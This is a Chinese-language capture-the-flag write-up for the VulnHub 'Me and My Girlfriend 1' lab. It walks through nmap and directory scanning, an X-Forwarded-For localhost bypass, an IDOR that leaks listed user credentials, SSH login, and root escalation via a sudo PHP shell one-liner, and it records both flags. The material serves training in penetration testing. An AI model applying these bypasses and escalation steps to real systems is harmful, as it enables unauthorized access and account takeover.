https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

Lampiao.zip.txt

0x01 信息收集

  1. > nmap 192.168.0.0/24
  2. Nmap scan report for 192.168.0.135
  3. Host is up (0.013s latency).
  4. Not shown: 998 closed ports
  5. PORT   STATE SERVICE
  6. 22/tcp open  ssh
  7. 80/tcp open  http
  8. MAC Address: 00:0C:29:E1:51:9F (VMware)

0x02 目录扫描

  1. http://192.168.0.135/robots.txt
  2. http://192.168.0.135/heyhoo.txt
  3. http://192.168.0.135/config/
  4. http://192.168.0.135/config/config.php
  5. http://192.168.0.135/misc/
  6. http://192.168.0.135/misc/process.php
  7. http://192.168.0.135/index.php/login/

0x03 手工测试

抓包发现提示
image-20210629005104903.png
使用x-forwarded-for伪装成本地地址访问成功
image-20210629005214519.png

修改密码处发现ID越权并且密码可见
image-20210629200336913.png

将上面的用户和密码记录下来,前面nmap扫出一个22端口,可尝试登录一波

  1. eweuhtandingan:skuyatuh
  2. aingmaung:qwerty!!!
  3. sundatea:indONEsia
  4. sedihaingmah:cedihhihihi
  5. alice:4lic3
  6. abdikasepak:dorrrrr
  7. test:123

成功使用alice账号登录
image-20210629201124219.png
查看之前扫描到的可疑目录文件发现一个mysql连接字符串(回头尝试使用这个mysql账号和密码登录系统发现这个就是系统管理员root账号的密码

  1. http://192.168.0.135/config/config.php

image-20210629201307103.png

  1. http://192.168.0.135/misc/process.php

image-20210629201442392.png

使用find命令查找flag发现第一个flag

  1. find / -name flag*

image-20210629201908592.png
image-20210629201948758.png

  1. Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

第一个Flag提示要去root目录,因为现在没有权限访问root目录所以要进行提权操作

0x04 主机信息收集

GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
上传Linux信息收集脚本发现一个sudoers提权方法
image-20210629222529661.png

  1. sudo -l

image-20210629224339064.png
https://gtfobins.github.io/gtfobins/php/

  1. sudo php -r "system('/bin/bash');"

image-20210629213303659.png
顺利拿到第二个flag

  1. Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}

image-20210629213428741.png